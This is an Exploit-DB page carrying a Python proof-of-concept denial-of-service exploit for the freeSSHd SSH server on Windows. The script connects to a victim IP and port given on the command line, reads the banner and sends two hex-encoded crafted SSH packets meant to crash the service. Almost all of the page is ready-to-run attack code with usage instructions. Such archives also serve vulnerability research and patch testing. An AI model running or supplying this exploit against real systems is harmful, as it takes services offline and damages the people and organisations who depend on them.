freeSSHd - Denial of Service (PoC)

EDB-ID:

18268

CVE:

EDB Verified:

Author:

Level

Type:

dos

Exploit: /

Platform:

Windows

Date:

2011-12-24

Vulnerable App:

import sys, socket, binascii
print "\n"  
print "----------------------------------------------------------------" 
print "|      FreeSSHd, Remote Denial of Service                       |" 
print "|      Level, Smash the Stack                                   |" 
print "----------------------------------------------------------------" 
print "\n" 
buf = [
 ("5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8"
 "55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686"
 "13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6"
 "469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6"
 "16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686"
 "1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323"
 "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393"
 "22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626"
 "c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636"
 "2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616"
 "5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657"
 "33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626"
 "32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657"
 "32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312"
 "c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632"
 "d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6"
 "c696200000000000000000000000000aac55b402546"),
 ("0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902"
 "46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4"
 "3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294"
 "5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac"
 "e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55"
 "b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e"
 "3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527")
 ]
def usage():  
        print "usage  : ./freesshd.py <victim_ip>  <victim_port>" 
        print "example: ./freesshd.py 192.168.1.22 22"    
def main():   
    if len(sys.argv) != 3:  
            usage()  
            sys.exit()  
   
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
   
    HOST = sys.argv[1]  
    PORT = int(sys.argv[2])  
    s.connect((HOST,PORT))  
    data = s.recv(1024)  
    print data  
    print "[*] Sending Payload...\n" 
    for i in range(0,len(buf)):
 s.send(binascii.unhexlify(buf[i]))
    print "[*] Closing Socket...\n" 
    s.close()  
if __name__ == "__main__":  
    main()

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services